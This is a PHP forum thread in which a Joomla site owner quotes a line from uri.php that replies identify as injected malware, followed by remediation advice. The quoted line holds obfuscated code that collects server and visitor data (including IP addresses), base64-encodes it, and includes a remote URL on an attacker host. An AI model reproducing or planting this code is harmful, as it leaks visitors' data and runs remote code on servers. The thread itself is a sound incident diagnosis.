Parse error, syntax error

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

Post Reply
vlastanovak
Forum Newbie
Posts: 2
Joined: Fri Jun 26, 2009 3:05 pm

Parse error, syntax error

Post by vlastanovak »

Hi guys,

I've not had any problems in the past and my site has been operational for months - I also haven't made any changes to my site in weeks.. BUT all of a sudden I am getting the following error message when trying to access my Joomla installation;

Code: Select all

Parse error: syntax error, unexpected '"', expecting T_STRING or T_VARIABLE or T_NUM_STRING in /home/ausnzcla/public_html/libraries/joomla/environment/uri.php on line 741
So I have isolated the line and the line is;

Code: Select all

$regex = "<^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\\?([^#]*))?(#(.*))error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."behgazzazbzefa".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}?>";
Does anyone have any idea where the error is?

SITE URL:ausnzclancentral . com See next post!!

Thanks.
icesolid
Forum Regular
Posts: 502
Joined: Mon May 06, 2002 9:36 pm
Location: Buffalo, NY

Re: Parse error, syntax error

Post by icesolid »

Please re-post this with

Code: Select all

so I can read your code better.
User avatar
McInfo
DevNet Resident
Posts: 1532
Joined: Wed Apr 01, 2009 1:31 pm

Re: Parse error, syntax error

Post by McInfo »

WARNING :!: Do not run the script posted above and do not click on the link.

You have been hacked! The script is attempting to send your server variables to a Russian site, behgazzazbzefa.users.phpinclude.ru. Fortunately, the hacker was sloppy and edited the script in a way that causes a parse error, so it is possible that the edited script has never run and none of your users' IP addresses have been sent to the hacker's site. Unfortunately, you have a security hole that allowed the hacker to change your files.

Reinstall Joomla or restore uri.php by replacing it with a clean copy. Download Joomla here. Save the hacked copy for forensic evidence. Find the security hole.

Edit: This post was recovered from search engine cache.
Last edited by McInfo on Wed Jun 16, 2010 12:31 pm, edited 1 time in total.
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: Parse error, syntax error

Post by Eric! »

That's a strange place in the code to put in a hack (source in link).
http://api.joomla.org/__filesource/fsou ... i.php.html

I would assume you might have other hidden hacks in your site as well.

One hole in joomla itself is a serious admin password hack in 1.5.0 and fixed recently in 1.5.6.
http://www.website-ideas.co.uk/2009/02/ ... joomla-15/
vlastanovak
Forum Newbie
Posts: 2
Joined: Fri Jun 26, 2009 3:05 pm

Re: Parse error, syntax error

Post by vlastanovak »

So what would you advise I do? Can I re-install Joomla without losing my DB data or template?
User avatar
McInfo
DevNet Resident
Posts: 1532
Joined: Wed Apr 01, 2009 1:31 pm

Re: Parse error, syntax error

Post by McInfo »

Your database should not be affected by reinstalling the scripts, but make a backup just in case. I have not worked with Joomla, so I don't know how its installer operates (I'm assuming it has one).

You should be able to make a copy-backup of your template and put it back in the templates folder after reinstalling Joomla. However, your template files may have also been compromised by the attack. So, if you can, install a clean copy of the template.

Edit: This post was recovered from search engine cache.
Last edited by McInfo on Wed Jun 16, 2010 12:31 pm, edited 1 time in total.
Eric!
DevNet Resident
Posts: 1146
Joined: Sun Jun 14, 2009 3:13 pm

Re: Parse error, syntax error

Post by Eric! »

Joomla may not have been how they got in either. Check the file date on uri.php and look for other files with similar change/mod times...assuming the hacker was sloppy. Also check your raw log files for suspicious access to your site. Change all your passwords too. If your database had unencrypted passwords you need to get your users to change them as the database could have been copied.

It wouldn't hurt to notify your host of the details as they are sometimes willing to help analize and monitor your account. Sometimes attacks can come from users sharing the host server with you and they found a way into your files.
Post Reply